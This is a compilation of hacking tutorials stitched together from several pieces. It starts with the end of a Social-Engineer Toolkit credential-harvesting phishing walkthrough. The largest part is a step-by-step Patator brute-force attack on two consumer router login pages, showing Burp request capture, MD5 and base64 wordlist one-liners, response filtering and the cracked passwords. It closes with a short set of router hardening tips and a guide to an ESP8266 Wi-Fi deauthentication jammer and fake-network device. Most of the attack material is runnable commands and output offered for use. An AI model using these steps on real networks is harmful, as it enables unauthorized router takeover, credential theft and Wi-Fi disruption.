I am not good at story telling (thats the point), to sum up the attack so far the steps are:

  • Open ‘setoolkit’
  • Choose 1) Social Engineering Attacks
  • Choose 2) Website Attack Vectors
  • Choose 3) Credential Harvester Attack Method
  • Choose 1) Web Templates
  • Input the IP address
  • Choose Google
  • Happy hunting ^_^

Break into Router Gateways with Patator

Router gateways are responsible for protecting every aspect of a network’s configuration. With unfettered access to these privileged configurations, an attacker on a compromised Wi-Fi network can perform a wide variety of advanced attacks.

Brute-Forcing Router Logins with Patator

After hacking a Wi-Fi router with tools like AircrackWifiphisher, and Wifite2, there are several avenues an attacker may explore to further compromise the network. Assuming the gateway isn’t using default credentials, the attacker will try to exploit a vulnerability in the router or perform a brute-force attack.

With access to the router’s gateway and complete control over the configurations, a hacker in this position of power can perform a variety of attacks. They could do any of the following, and then some.

  • perform DNS poisoning attacks
  • modify or manipulate forwarding ports
  • reset the gateway password
  • inject JavaScript into a browser on the network
  • reset the Wi-Fi name and password
  • install a malicious firmware
  • modify or delete login and system logs
  • modify or disable the firewall

Patator, like Hydra and Medusa, is a command-line brute-forcing tool. The developers have tried to make it more reliable and flexible than its predecessors. My favorite feature of Patator is the raw_request module that allows penetration testers to brute-force HTTP logins much like Burp’s Intruder module.

A General Outline for an Attack

To demonstrate, I’m going to show how to use Patator against two popular consumer routers found on Amazon. Not all router gateways handle authentication the same. I’ll show a kind of general procedure to follow when performing such attacks.

  1. Capture a login request: A single login attempt is captured in Burp to analyze the request.
  2. Identify the parameters: It’s important to identify where the dynamic parameters (i.e., username and password) are stored in the request as some login forms handle authentication differently.
  3. Modify and save the request: After the parameters have been identified, insert a placeholder into the request to help Patator iterate through the desired wordlist.
  4. Generate a targeted wordlist: A targeted wordlist containing 10,000 passwords is usually more effective than a wordlist of 10 million random passwords. Some authentication methods involve hashing or encoding the credentials in the client’s browser before making the request. The wordlist will need to reflect this as needed.
  5. Identity and filter failed requests: With modern routers, very rarely will a successful login attempt makes itself known. Understanding and filtering HTTP status codes play a big part in identifying the difference between a failed and successful login attempt.

Now, a word of caution: Patator isn’t very beginner-friendly, so there’s a bit of a learning curve with the syntax that can take some getting used to. Before proceeding, you should have a general understanding of HTTP requests, HTTP status codes, and some experience with Burp’s Intruder module.

Install Patator in Kali Linux

Use the following apt-get command to install Patator in Kali.

~# apt-get update && apt-get install patator

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
  ca-certificates-java default-jre default-jre-headless fonts-dejavu-extra freerdp2-x11 ike-scan java-common ldap-utils libatk-wrapper-java libatk-wrapper-java-jni libfreerdp-client2-2
  libfreerdp2-2 libgif7 libwinpr2-2 openjdk-11-jre openjdk-11-jre-headless patator python3-ajpy python3-bcrypt python3-dnspython python3-ipy python3-mysqldb python3-nacl python3-openssl
  python3-paramiko python3-psycopg2 unzip
0 upgraded, 27 newly installed, 0 to remove and 0 not upgraded.
Need to get 43.9 MB of archives.
After this operation, 192 MB of additional disk space will be used.
Do you want to continue? [Y/n]

When that’s done, use the –help option to verify Patator was successfully installed and view the available modules.

~# patator --help

Patator v0.7 (https://github.com/lanjelot/patator)
Usage: patator module --help

Available modules:
  + ftp_login     : Brute-force FTP
  + ssh_login     : Brute-force SSH
  + telnet_login  : Brute-force Telnet
  + smtp_login    : Brute-force SMTP
  + smtp_vrfy     : Enumerate valid users using SMTP VRFY
  + smtp_rcpt     : Enumerate valid users using SMTP RCPT TO
  + finger_lookup : Enumerate valid users using Finger
  + http_fuzz     : Brute-force HTTP
  + ajp_fuzz      : Brute-force AJP
  + pop_login     : Brute-force POP3
  + pop_passd     : Brute-force poppassd (http://netwinsite.com/poppassd/)
  + imap_login    : Brute-force IMAP4
  + ldap_login    : Brute-force LDAP
  + smb_login     : Brute-force SMB
  + smb_lookupsid : Brute-force SMB SID-lookup
  + rlogin_login  : Brute-force rlogin
  + vmauthd_login : Brute-force VMware Authentication Daemon
  + mssql_login   : Brute-force MSSQL
  + oracle_login  : Brute-force Oracle
  + mysql_login   : Brute-force MySQL
  + mysql_query   : Brute-force MySQL queries
  + rdp_login     : Brute-force RDP (NLA)
  + pgsql_login   : Brute-force PostgreSQL
  + vnc_login     : Brute-force VNC
  + dns_forward   : Forward DNS lookup
  + dns_reverse   : Reverse DNS lookup
  + snmp_login    : Brute-force SNMP v1/2/3
  + ike_enum      : Enumerate IKE transforms
  + unzip_pass    : Brute-force the password of encrypted ZIP files
  + keystore_pass : Brute-force the password of Java keystore files
  + sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
  + umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
  + tcp_fuzz      : Fuzz TCP services
  + dummy_test    : Testing module

As stated, we’ll focus on the http_fuzz module, designed to brute-force HTTP logins as well as perform various types of web-based injection attacks (e.g., fuzzing). View the available http_fuzz options using the following command.

~# patator http_fuzz --help

Patator v0.7 (https://github.com/lanjelot/patator)
Usage: http_fuzz <module-options ...> [global-options ...]

Examples:
  http_fuzz url=http://10.0.0.1/FILE0 0=paths.txt -x ignore:code=404 -x ignore,retry:code=500
  http_fuzz url=http://10.0.0.1/manager/html user_pass=COMBO00:COMBO01 0=combos.txt -x ignore:code=401
  http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST body='pma_username=root&pma_password=FILE0&server=1&lang=en' 0=passwords.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in to the MySQL server'

Module options:
  url           : target url (scheme://host[:port]/path?query)
  body          : body data
  header        : use custom headers
  method        : method to use [GET|POST|HEAD|...]
  raw_request   : load request from file
  scheme        : scheme [http|https]
  auto_urlencode: automatically perform URL-encoding [1|0]
  user_pass     : username and password for HTTP authentication (user:pass)
  auth_type     : type of HTTP authentication [basic | digest | ntlm]
  follow        : follow any Location redirect [0|1]
  max_follow    : redirection limit [5]
  accept_cookie : save received cookies to issue them in future requests [0|1]
  proxy         : proxy to use (host:port)
  proxy_type    : proxy type [http|socks4|socks4a|socks5]
  resolve       : hostname to IP address resolution to use (hostname:IP)
  ssl_cert      : client SSL certificate file (cert+key in PEM format)
  timeout_tcp   : seconds to wait for a TCP handshake [10]
  timeout       : seconds to wait for a HTTP response [20]
  before_urls   : comma-separated URLs to query before the main request
  before_header : use a custom header in the before_urls request
  before_egrep  : extract data from the before_urls response to place in the main request
  after_urls    : comma-separated URLs to query after the main request
  max_mem       : store no more than N bytes of request+response data in memory [-1 (unlimited)]
  persistent    : use persistent connections [1|0]

Global options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit

  Execution:
    -x arg              actions and conditions, see Syntax below
    --start=N           start from offset N in the wordlist product
    --stop=N            stop at offset N
    --resume=r1[,rN]*   resume previous run
    -e arg              encode everything between two tags, see Syntax below
    -C str              delimiter string in combo files (default is ':')
    -X str              delimiter string in conditions (default is ',')
    --allow-ignore-failures
                        failures cannot be ignored with -x (this is by design
                        to avoid false negatives) this option overrides this
                        behavior

  Optimization:
    --rate-limit=N      wait N seconds between each test (default is 0)
    --timeout=N         wait N seconds for a response before retrying payload
                        (default is 0)
    --max-retries=N     skip payload after N retries (default is 4) (-1 for
                        unlimited)
    -t N, --threads=N   number of threads (default is 10)

  Logging:
    -l DIR              save output and response data into DIR
    -L SFX              automatically save into DIR/yyyy-mm-dd/hh:mm:ss_SFX
                        (DIR defaults to '/tmp/patator')

  Debugging:
    -d, --debug         enable debug messages

Syntax:
 -x actions:conditions

    actions    := action[,action]*
    action     := "ignore" | "retry" | "free" | "quit" | "reset"
    conditions := condition=value[,condition=value]*
    condition  := "code" | "size" | "time" | "mesg" | "fgrep" | "egrep" | "clen"

    ignore      : do not report
    retry       : try payload again
    free        : dismiss future similar payloads
    quit        : terminate execution now
    reset       : close current connection in order to reconnect next time

    code        : match status code
    size        : match size (N or N-M or N- or -N)
    time        : match time (N or N-M or N- or -N)
    mesg        : match message
    fgrep       : search for string in mesg
    egrep       : search for regex in mesg
    clen        : match Content-Length header (N or N-M or N- or -N)

For example, to ignore all redirects to the home page:
... -x ignore:code=302,fgrep='Location: /home.html'

 -e tag:encoding

    tag        := any unique string (eg. T@G or _@@_ or ...)
    encoding   := "hex" | "unhex" | "b64" | "md5" | "sha1" | "url"

    hex         : encode in hexadecimal
    unhex       : decode from hexadecimal
    b64         : encode in base64
    md5         : hash in md5
    sha1        : hash in sha1
    url         : url encode

For example, to encode every password in base64:
... host=10.0.0.1 user=admin password=_@@_FILE0_@@_ -e _@@_:b64

Please read the README inside for more examples and usage information.

1Attacking the Medialink AC1200 Router

The first router being attacked is the Medialink AC1200. It’s currently one of Amazon’s top choices for consumer router’s and quite popular.

Step 1Capture a Login Request with Burp

After configuring Firefox with Burp Suite’s Proxy module, navigate to the AC1200’s gateway at http://192.168.8.1/login.html.

Type „password“ into the password field and press Enter. Burp will intercept the login and display the below request.

Step 2Identify the Parameters

Notice the password= parameter isn’t „password“ as expected, but instead the scrambled „5f4dcc3b5aa765d61d8327deb882cf99“ string.

Those familiar with password hashing may recognize the hash as the MD5 for „password.“ It can be verified using the below command which prints the desired string into the md5sum command.

~# printf 'password' | md5sum

5f4dcc3b5aa765d61d8327deb882cf99  -

That tells us that the wordlist used when brute-forcing the gateway must be in MD5 format. With this particular router, at the gateway, there’s no available field for username input. We can see from the captured data that the „admin“ username is embedded into the request. So there’s only one dynamic parameter: the password.

Step 3Modify & Save the Raw Request

Change the hashed password parameter to „FILE0“ within the request. The modification will act as a placeholder in the request that indicates to Patator where to insert the passwords. (The reason for this will be clear in a later step.)

When that’s done, right-click inside the Burp window and select the „Copy to file“ option. Save it to the /tmp directory with the „router_request.txt“ filename.

Step 4Generate a Targeted Wordlist

As we discovered previously, passwords are hashed in the browser before being sent to the router. Patator has a built-in feature to hash passwords, but let’s take this opportunity to learn some Bash password manipulation tricks.

First, download a preferred wordlist. Any generic wordlist will do fine for testing purposes. Use the below wget command to download my wordlist generated by analyzing leaked databases.

~# wget 'https://git.io/fhhvc' -O /tmp/wordlist.txt

--2020-01-15 03:19:58--  https://git.io/fhhvc
Resolving git.io (git.io)... 52.7.169.168
Connecting to git.io (git.io)|52.7.169.168|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt [following]
--2019-03-08 03:20:01--  https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.68.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.68.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25585 (25K) [text/plain]
Saving to: ‘wordlist.txt’

wordlist.txt                      100%[========================================>]  24.99K  68.9KB/s    in 0.4s

2020-01-15 03:20:05 (68.9 KB/s) - ‘wordlist.txt’ saved [25585/25585]

The below Bash one-liner will use a while loop to iterate through the passwords in the wordlist. Each password will be converted into an MD5 and appended to the md5_wordlist.txt file.

~# while read password; do printf "$password" | md5sum | awk '{print $1}'; done < /tmp/wordlist.txt >>/tmp/md5_wordlist.txt

The new md5_wordlist.txt file can be viewed using the below head command, to print the first ten lines.

~# head /tmp/md5_wordlist.txt

e10adc3949ba59abbe56e057f20f883e
e587466319da83fe4bdf4ceae9746357
dc483e80a7a0bd9ef71d8cf973673924
eba4820c4a707c3c72d16050177423b6
9924d38821446082ce5e4c9d88e1430f
b3d3bdba829b1fef75a5b22c20a14738
5f4dcc3b5aa765d61d8327deb882cf99
e680528370af6ef220d0f23b8e58e812
d234e0453a5f37630379880b9136e959
1acc444503b44377c3ba6e595fcf2940

Step 5Identify & Filter Failed Requests

With the router_request.txt and the wordlist of hashed passwords, the router’s gateway can be brute-forced with the following Patator command. To stop the brute-force attack at any time, press Control-C on the keyboard.

~# patator http_fuzz raw_request=/tmp/router_request.txt accept_cookie=1 follow=1 0=/tmp/md5_wordlist.txt -l /tmp/AC1200

To break that command down:

  • raw_request= — Use the router_request.txt created in an earlier step to generate login attempts against the router’s gateway.
  • accept_cookie= — Save received cookies to issue them in future requests.
  • follow= — Follow Location redirects (e.g., status code 302), for both failed and successful login attempts if instructed by the server.
  • 0= — The „FILE0“ placeholder in the router_request.txt will iterate through the provided list of passwords.
  • -l — Save output data into the provided directory. All of Patator’s responses will be stored in an organized fashion.

After running the command, my output looks like this:

code size:clen       time | candidate                          |   num | mesg
-----------------------------------------------------------------------------
200  20:-1          0.015 | e10adc3949ba59abbe56e057f20f883e   |     1 | HTTP/1.0 200 OK
200  20:-1          0.035 | e587466319da83fe4bdf4ceae9746357   |     2 | HTTP/1.0 200 OK
200  20:-1          0.048 | dc483e80a7a0bd9ef71d8cf973673924   |     3 | HTTP/1.0 200 OK
200  20:-1          0.041 | eba4820c4a707c3c72d16050177423b6   |     4 | HTTP/1.0 200 OK
200  20:-1          0.054 | 9924d38821446082ce5e4c9d88e1430f   |     5 | HTTP/1.0 200 OK
200  20:-1          0.060 | 5f4dcc3b5aa765d61d8327deb882cf99   |     7 | HTTP/1.0 200 OK
200  20:-1          0.067 | 1acc444503b44377c3ba6e595fcf2940   |    10 | HTTP/1.0 200 OK
200  20:-1          0.069 | 25d55ad283aa400af464c76d713c07ad   |    11 | HTTP/1.0 200 OK
200  20:-1          0.069 | d8578edf8458ce06fbc5bb76a58c5ca4   |    12 | HTTP/1.0 200 OK
200  20:-1          0.070 | bfcfa776182bf88f23cc0e78bde9bd55   |    13 | HTTP/1.0 200 OK
200  20:-1          0.070 | 5fcfd41e547a12215b173ff47fdd3739   |    14 | HTTP/1.0 200 OK
200  20:-1          0.070 | 02c75fb22c75b23dc963c7eb91a062cc   |    15 | HTTP/1.0 200 OK
200  20:-1          0.079 | b3d3bdba829b1fef75a5b22c20a14738   |     6 | HTTP/1.0 200 OK
200  20:-1          0.070 | f26e6a5828c8a1c908f86c0674c4b0c1   |    16 | HTTP/1.0 200 OK
200  20:-1          0.070 | 0d107d09f5bbe40cade3de5c71e9e9b7   |    17 | HTTP/1.0 200 OK
200  20:-1          0.073 | e680528370af6ef220d0f23b8e58e812   |     8 | HTTP/1.0 200 OK
200  20:-1          0.070 | 25f9e794323b453885f5181f1b624d0b   |    18 | HTTP/1.0 200 OK
200  20:-1          0.086 | d234e0453a5f37630379880b9136e959   |     9 | HTTP/1.0 200 OK
200  20:-1          0.069 | 9aaee58c21bf17a001b5325dffecbb6c   |    19 | HTTP/1.0 200 OK
200  20:-1          0.069 | c41788ac68e6c17c59a6412c424dc763   |    20 | HTTP/1.0 200 OK
200  20:-1          0.069 | 7702417fd301623eff2ba8f6abf05ff6   |    21 | HTTP/1.0 200 OK
200  20:-1          0.069 | a79e7fabc870d2c67141008c58088b47   |    31 | HTTP/1.0 200 OK
200  20:-1          0.069 | e99a18c428cb38d5f260853678922e03   |    22 | HTTP/1.0 200 OK
200  20:-1          0.069 | 4297f44b13955235245b2497399d7a93   |    32 | HTTP/1.0 200 OK
200  20:-1          0.069 | e7d094da9fe5b55c3a84806ba4fd3276   |    23 | HTTP/1.0 200 OK
200  20:-1          0.067 | 9ccc031dbebc6705fc8443df29b0971f   |    33 | HTTP/1.0 200 OK
200  20:-1          0.069 | 04085330aed79347b6427f9111ce384f   |    24 | HTTP/1.0 200 OK
200  20:-1          0.069 | 1c63129ae9db9c60c3e8aa94d3e00495   |    34 | HTTP/1.0 200 OK
200  20:-1          0.069 | ccebddaa34a9459df50d2d32177ea06e   |    25 | HTTP/1.0 200 OK
200  20:-1          0.069 | 5416d7cd6ef195a0f7622a9c56b55e84   |    26 | HTTP/1.0 200 OK
200  20:-1          0.069 | dccfdb716551ca6210e9b93248674dd7   |    27 | HTTP/1.0 200 OK
200  20:-1          0.069 | 1f6cac35000ad57b1af2e34926043ebe   |    28 | HTTP/1.0 200 OK
200  20:-1          0.069 | bed128365216c019988915ed3add75fb   |    29 | HTTP/1.0 200 OK
200  20:-1          0.069 | bc597773a32c44479efd83855733aed6   |    30 | HTTP/1.0 200 OK
200  20:-1          0.071 | d5e0708d403467017d4dd217178112b5   |    41 | HTTP/1.0 200 OK
200  20:-1          0.071 | 161ebd7d45089b3446ee4e0d86dbcf92   |    42 | HTTP/1.0 200 OK
200  20:-1          0.070 | 5dc5d1aa29ea20ce91ec6c7fe5a44f56   |    43 | HTTP/1.0 200 OK
200  20:-1          0.070 | 3d68b18bd9042ad3dc79643bde1ff351   |    44 | HTTP/1.0 200 OK
200  20:-1          0.069 | b76be48e061aa8948d153fec67a08cb4   |    35 | HTTP/1.0 200 OK
200  20:-1          0.071 | 3bf1289e5cd6187c0e0de34edfe27b90   |    45 | HTTP/1.0 200 OK

Hypertext Transfer Protocol (HTTP) status codes, also known as response codes, are issued by web servers to our web browser when we make requests. These codes are a way for web servers to communicate errors to syadmins, web developers, and end-users alike.

Sometimes the 200 („200 OK“) status code is an indication that the server accepted the provided password. In this case, every single login attempt is producing the „200 OK“ response — so it’s actually helping to identify what a failed login attempt looks like.

The „size“ column can also be extremely helpful. It will display the size (in bytes) of the server’s response to the login attempt. It’s returning 20 bytes with every login attempt, so it’s probably safe to assume this byte size indicates a failed login attempt, in which case, it’s safe to omit responses of that size. We can do so by adding the -x ignore:size=20 option and argument.

~# patator http_fuzz raw_request=router_request.txt -x ignore:size=20 accept_cookie=1 follow=1 0=/tmp/md5_wordlist.txt -l /tmp/AC1200

code size:clen       time | candidate                          |   num | mesg
-----------------------------------------------------------------------------
200  3962:3363      0.201 | d487dd0b55dfcacdd920ccbdaeafa351   |   291 | HTTP/1.0 200 OK
Hits/Done/Skip/Fail/Size: 1/3142/0/0/3142, Avg: 138 r/s, Time: 0h 0m 22s

Now, only one request is displayed, with a size of 3,962 bytes.

There are a few ways of unhashing a discovered password. The passwords in both wordlist.txt and md5_wordlist.txt appear in the same order. The only difference is that one wordlist is in plain text; the other is hashed.

Below, we’ll use nl to prepend a number to every line in the md5_wordlist.txt, then grep for the hash.

~# nl /tmp/md5_wordlist.txt | grep 'd487dd0b55dfcacdd920ccbdaeafa351'

291 d487dd0b55dfcacdd920ccbdaeafa351

The hash appears on line 291 of the md5_wordlist.txt file. Now, use nl on the plain text wordlist, and grep to find the line number.

~# nl /tmp/wordlist.txt | grep '291'

291 yellow

The password is „yellow.“ It can be further verified using the following command.

~# printf 'yellow' | md5sum

d487dd0b55dfcacdd920ccbdaeafa351

2Attacking the Netgear N300 Router

A router from the Netgear N300 series is next on the list of targets. It’s also one of Amazon’s top choices for entry-level, consumer Wi-Fi routers.

Step 1Capture a Login Request with Burp

We’ll follow the same procedure as before, starting with capturing the raw request. Navigate to the router’s gateway using a web browser configured to proxy through Burp. Enter the „admin“ and „password“ credentials when prompted.

Step 2Identify the Parameters

Notice this time there isn’t an obvious password= parameter like the Medialink AC1200 router.

The above string isn’t hashed with MD5. While it may appear encrypted or secured in some way, it’s using a simple base64 encoding. The string is decoded using the below command.

~# printf 'YWRtaW46cGFzc3dvcmQ=' | base64 -d

admin:password

The username and password are concatenated into a single string and encoded. This authentication method is called basic HTTP authentication. It should only be used with HTTPS, as an attacker on the network can easily capture the credentials in transit.

Step 3Modify & Save the Raw Request

With the username and password parameters identified, the raw request is modified to include the Patator placeholder („FILE0“) and saved to a local file.

Right-click inside the window and select the „Copy to file“ option. Save it to the /tmp directory with the „router_request.txt“ filename.

Step 4Generate a Targeted Wordlist

Now that we know the kind of authentication parameter being used, a wordlist can be generated specific to the router. Again, Patator has a built-in feature to encode passwords, but string manipulation with Bash is a good skill to learn. It can be applied to other brute-forcing tools, for example.

Download a generic wordlist for testing purposes. Use the below wget command to download my wordlist generated by analyzing leaked databases.

~# wget 'https://git.io/fhhvc' -O /tmp/wordlist.txt

The below Bash one-liner will use a while loop to iterate through the passwords in the wordlist. Each password will be concatenated into a single string with the username and password converted into base64. All of the encoded strings are appended to the /tmp/base64_wordlist.txt file.

~# while read password; do printf "admin:$password" | base64; done < /tmp/wordlist.txt >>/tmp/base64_wordlist.txt

The encoded passwords can be verified using the below head command to print the first ten lines of the file.

~# head /tmp/base64_wordlist.txt

YWRtaW46MTIzNDU2
YWRtaW46QWJjZGVmMTIz
YWRtaW46YTEyMzQ1Ng==
YWRtaW46bGl0dGxlMTIz
YWRtaW46bmFuZGEzMzQ=
YWRtaW46Tjk3bm9raWE=
YWRtaW46cGFzc3dvcmQ=
YWRtaW46UGF3ZXJqb24xMjM=
YWRtaW46NDIxdWlvcHkyNTg=
YWRtaW46TVl3b3JrbGlzdDEyMw==

Step 5Identify & Filter Failed Requests

The router’s gateway can be brute-forced with Patator using the router_request.txt and base64_wordlist.txt files. Remember, while in progress, Patator can be stopped at any time by pressing Control-C on the keyboard.

~# patator http_fuzz raw_request=/tmp/router_request.txt accept_cookie=1 follow=1 0=/tmp/base64_wordlist.txt -l /tmp/N300

code size:clen       time | candidate                          |   num | mesg
-----------------------------------------------------------------------------
401  508:-1         0.006 | YWRtaW46MTIzNDU2                   |     1 | HTTP/1.0 401 Unauthorized
401  508:-1         0.023 | YWRtaW46MTIzNDU2Nzg=               |    11 | HTTP/1.0 401 Unauthorized
401  508:-1         0.022 | YWRtaW46Y2h1cnUxMjNB               |    21 | HTTP/1.0 401 Unauthorized
401  508:-1         0.023 | YWRtaW46QWJjZGVmMTIz               |     2 | HTTP/1.0 401 Unauthorized
401  508:-1         0.024 | YWRtaW46cXdlcnR5                   |    12 | HTTP/1.0 401 Unauthorized
401  508:-1         0.007 | YWRtaW46YTEyMzQ1Ng==               |     3 | HTTP/1.0 401 Unauthorized
401  508:-1         0.024 | YWRtaW46bmtzMjMwa2pzODI=           |    13 | HTTP/1.0 401 Unauthorized
401  508:-1         0.024 | YWRtaW46bGl0dGxlMTIz               |     4 | HTTP/1.0 401 Unauthorized
401  508:-1         0.025 | YWRtaW46bmFuZGEzMzQ=               |     5 | HTTP/1.0 401 Unauthorized
401  508:-1         0.026 | YWRtaW46enhjdmJubQ==               |    15 | HTTP/1.0 401 Unauthorized
401  508:-1         0.023 | YWRtaW46Tjk3bm9raWE=               |     6 | HTTP/1.0 401 Unauthorized

HTTP status codes are split into several categories or „classes.“ The first digit defines the categories, and the following digits are subcategories specific to different types of error messages. For example, the 4xx categories are a class of errors specific to HTTP requests that cannot be fulfilled by the web server, like trying to view a webpage that doesn’t exist. That’s defined as a status „404 Not Found,“ probably one of the most well-known status codes on the internet.

We immediately notice a ton of 401 status codes in the Patator output, which are clear indications of a failed login requests. These are omitted from the output using the -x ignore:code=401 option and argument.

~# patator http_fuzz raw_request=/tmp/router_request.txt -x ignore:code=401 accept_cookie=1 follow=1 0=/tmp/base64_wordlist.txt -l /tmp/N300

code size:clen       time | candidate                          |   num | mesg
-----------------------------------------------------------------------------
200  622:-1         0.017 | YWRtaW46cGFzc3dvcmQ=               |     7 | HTTP/1.0 200 OK

This time, we received only one request with the 200 status code. The size of the response is 622 bytes, more than that of a failed 401 response. It’s a good sign. The login credentials are decoded using the following command.

~# printf 'YWRtaW46cGFzc3dvcmQ=' | base64 -d

admin:password

How to Protect Yourself from Router Gateway Attacks

Regularly updating the firmware will help prevent against exploits and Routersploit attacks. A strong (non-default) password will prevent brute-force attacks performed with Patator.

  • Update the firmware. Router manufacturers often issue bug and exploit patches. It’s important to keep the router firmware up to date and have it check for updates automatically if possible.
  • Disable remote administration. Some consumer routers allow for remote access by default. Without knowing it, hackers may find your router on Shodan and seize control of it.
  • WPA2 encryption. Only use WPA2 encryption. Weaker encryption options like WEP will leave the router extremely vulnerable to attackers.
  • Change default passwords. Never use the default credentials. In addition to the WPA2 pre-shared key, the admin portal (router gateway) should also be protected by a strong password. It’s the only defensive measure preventing an attacker from discovering default credentials and modifying sensitive settings.
  • Disable WPS. WPS is featured in most consumer routers and designed to make password-less authentication more convenient. Unfortunately, the feature is usually enabled by default and easily exploited by hackers.
  • Be persistent. Change your Wi-Fi password every few months. It’s a pain to update the Wi-Fi password for every device on the network, but this tactic will keep hackers guessing — literally. If a hacker has captured the WPA2 handshake and spends several weeks trying to crack the password, changing it will render the captured handshake useless.

Unfortunately, none of the routers I tested support HTTPS when authenticating the admin settings. So an attacker on the network inspecting traffic will be able to passively discover the login password — even if it’s a totally random 42-character password.

Scan, Fake & Attack Wi-Fi Networks with the ESP8266-Based WiFi Deauther

The price of hacking Wi-Fi has fallen dramatically, and low-cost microcontrollers are increasingly being turned into cheap yet powerful hacking tools. One of the most popular is the ESP8266, an Arduino-programmable chip on which the Wi-Fi Deauther project is based. On this inexpensive board, a hacker can create fake networks, clone real ones, or disable all Wi-Fi in an area from a slick web interface.

The Rise of Microcontrollers as Offense Wi-Fi Tools

Wi-Fi hacking has usually relied on a couple of pieces of hardware to do the trick. First, you’d need a computer capable of running whatever attack program you’re trying to use. Second, you’d need a wireless network adapter with a chipset that supports whatever bad Wi-Fi thing you’re trying to do. Things could get expensive, with the cheapest combination of a Raspberry Pi and a wireless network adapter still coming in at around $70 to get started.

For a lot less, microcontrollers are capable of many of the same attacks the larger and more expensive Raspberry Pi can do. While a microcontroller isn’t capable of running a full operating system like Kali Linux, they are often easier to run due to the simple way in which they are programmed. It’s made even more simple by the fact that these microcontrollers can be programmed in the popular Arduino IDE, allowing projects to be easily shared.

While Wi-Fi-enabled microcontrollers like the ESP8266 do not officially support attacking Wi-Fi networks, and old SDK allows a hacker to build packets manually, thus being able to emulate many kinds of useful packets. That led CS student and chicken-in-space Stefan „Spacehuhn“ Kremser to create the Wi-Fi Deauther, a program for the ESP8266 capable of several powerful Wi-Fi attacks.

The ESP8266 Deauther Program

The most useful packets the Wi-Fi Deauther can create are deauthentication and disassociation packets. These packets are often abused because they are unauthenticated, meaning anyone on a network can send them to anyone else while pretending the messages are coming from the router. When a device on the Wi-Fi network receives the packet, it immediately disconnects from the network. The Wi-Fi Deauther does this over and over, spamming connected devices with „disconnect“ messages. It results in a „jamming“ effect on the network as devices cannot connect fast enough to avoid being instantly kicked off.

That’s not the only trick the Deauther program has up its sleeve. It’s also capable of scanning for both nearby access points and connected devices, and cloning any Wi-Fi network it sees. It can also generate dozens of fake Wi-Fi networks with any names you want, monitor channels for packet traffic between devices, and do all of this from a fancy built-in web interface similar to a Wi-Fi Pineapple.

The Wi-Fi Deauther program can be run on nearly any ESP8266-based development board, including the NodeMCU, the D1 Mini, and others. These boards are cheap and can be as low as $2 to $6 depending on the manufacturer, and they allow anyone to get started hacking Wi-Fi.

While the cheapest boards are a good start, they lack a few things that make the Deauther a lot more useful. The most simple, cheap boards have no screen, no buttons or controls, and no indicators to know what’s going on just by looking at the device. To control it, you’d need to log in to the web interface or buy and attach the hardware yourself.

The ESP8266 Deauther Board

Fortunately, Spacehuhn partnered with a board producer to create a custom ESP8266-based development board for security projects. This version of the ESP8266 features options that can be explored through a (somewhat fragile) selector switch that scrolls through menu options on an OLED display. The board allows any external antenna to be mounted on it, features an RGB LED for showing what mode the device is in, and connects either to a LiPo battery or USB power source directly.

Image by Kody/Null Byte

Upon powering up the custom board, it’s easy to scroll through the options to operate the board by hand. It’s is a leg up on even the Raspberry Pi, which tells you almost nothing just by plugging it in without a screen. With only a battery pack, you can power the Deauther board, select a target, and launch an attack without the need for a viewing or controlling device, as is often the case with devices like the Pi Zero W.

Due to reliability issues with cheap suppliers and the numerous hardware benefits the official board offers, I highly recommend the official DSTIKE version for anyone wanting to try this project, which costs $12. There are some copycat versions available on Amazon, but they usually cost more and, again, could come from cheap suppliers. Also, while it’s possible to do this with a cheap NodeMCU, you’ll need a second device to log in and control the device.

What You’ll Need

To get started with the Wi-Fi Deauther project, you’ll need an ESP8266-based development board. The best way to follow the project and stay involved with updates to the software is to purchase the original board design on Tindie. This project should work with the following Spacehuhn-designed boards.

While all of these boards are unique and come with different hardware, all are based on the ESP8266, and any will work with the Wi-Fi Deauther program. Also, buying them supports the researcher behind the program, and it gives you access to extended hardware features that make the board more useful without needing a second device to control it.

While there are rip-offs of the designs available for less or even more, they often don’t use the same hardware or use cheaper manufacturing techniques, leading to frustrating failures that add up over time.

Real and fake Deauther boards for comparison.Image via Spacehuhn’s GitHub

If you’re on a budget and don’t mind using a device without a screen, you can do this project for cheap with either of the following boards. You can read more about the kinds of boards that will work for this project on Spacehuhn’s GitHub page.

There are several versions of the NodeMCU, but only the version 1.0 fits nicely on a breadboard. The V3 is not as good for this project.Image via Spacehuhn’s GitHub

Aside from the board, you’ll need a computer or smartphone with Wi-Fi to join the network that the board creates. You’ll need a Micro-USB cable to supply power, and a power source like a battery to plug it in to. Once you have a computer or smartphone to control the Deauther, with Micro-USB cable and power source, as well as a network you have permission to test out the Deauther on, you’re ready to begin.

Step 1Get Your Board Ready

If you have the original board, it should come preloaded with the latest Wi-Fi Deauther program. You should be able to power on the board by plugging it into a USB power source and using the screen and selector switch to scroll through the menu options directly. Be careful with the selector switch, though, as it has a tendency to become unsoldered from the board and requires some basic knowledge of soldering to reattach.

Skip to Step 2 if you’re using the original Deauther board. If not, you’ll need to take a few steps to get set up. First, download and install the Arduino IDE. Once you’ve done that, you’ll need to click on the „Arduino“ or „File“ drop-down menu, then select „Preferences“ from the menu that appears. Next, click the dual-window icon next to the Additional Boards Manager URLs field, then paste the following URLs, one each to a line. Once that’s complete, click „OK“ to save, then „OK“ again to close the menu.

http://arduino.esp8266.com/stable/package_esp8266com_index.json
http://phpsecu.re/esp8266/package_deauther_index.json

Next, you’ll need to add the board you’re using to the Boards Manager. To do this, you’ll need to click on „Tools,“ then hover over the „Board“ section to see the drop-down list of supported boards. At the top, click „Boards Manager“ to open the window that will allow us to add more boards.

When the Boards Manager window opens, type „esp8266“ into the search bar. Select and install both „arduino-esp8266-deauther“ and „esp8266“ to add support for the board to your Arduino IDE.

